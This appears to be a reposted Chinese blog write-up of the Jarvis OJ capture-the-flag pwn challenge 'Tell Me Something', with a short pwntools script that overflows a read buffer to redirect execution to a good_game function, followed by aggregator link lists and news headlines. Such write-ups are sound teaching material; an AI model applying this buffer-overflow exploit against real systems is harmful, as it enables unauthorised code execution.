18.9.19 Jarvis OJ PWN----Tell Me Something

其他 2018-10-08 16:22:06 阅读次数: 0

我先checksec一下

可以栈溢出，发现主函数里的read函数就可以溢出

我们可以看到函数列表里还有个函数叫good_game

那直接覆盖然会地址就好啦

上脚本

#函数主体

cn.recvuntil("Input your message:\n")
goodgame_addr=0x00400620
payload='a'*(0x88)+p64(goodgame_addr)
cn.sendline(payload)
cn.interactive()

猜你喜欢

转载自blog.csdn.net/qq_42192672/article/details/82772153

18.9.19 Jarvis OJ PWN----Tell Me Something

(Jarvis Oj)(Pwn) Tell Me Something

Jarvis OJ Tell Me Something

Jarvis Oj Pwn 学习笔记-Tell Me Something

18.9.19 Jarvis OJ PWN----Smashes

Pwn-Tell Me Something

jarvisoj pwn tell me something

18.9.19 Jarvis OJ PWN----[XMAN]level2(x64)

JarvisOJ PWN Tell me Something wp

[BUUCTF]PWN——jarvisoj_tell_me_something

[Jarvisos]Tell me something

jarvisoj_tell_me_something

【jarvisoj刷题之旅】pwn题目Tell Me Something的writeup

(Jarvis Oj)(Pwn) Smashes

(Jarvis Oj)(Pwn) Guess

(Jarvis Oj)(Pwn) fm

Jarvis OJ Pwn Wp

(Jarvis Oj)(Pwn) level3

Jarvis Oj Pwn 学习笔记-fm

(Jarvis Oj)(Pwn) level5

(Jarvis Oj)(Pwn) level4

(Jarvis Oj)(Pwn) level2

(Jarvis Oj)(Pwn) level1

(Jarvis Oj)(Pwn) level0

Jarvis OJ PWN level3

Jarvis OJ PWN level1

Jarvis OJ（PWN）level0

[Jarvis OJ - PWN]——[XMAN]level3

[Jarvis OJ - PWN]——[XMAN]level0

[Jarvis OJ - PWN]——[XMAN]level1

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

基本数据类型封装类比较 Java源码解读(一) 8种基本类型对应的封装类型

JS实现无缝滚动上

深入解析HashMap原理（基于JDK1.8）

mysql的连接池

关于.htc

linux下的ubuntu12.04图形界面

【数论】好推不好记的扩展欧几里德

设备树详解

cscope + tags 简单设置

xml学习

每日归档

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)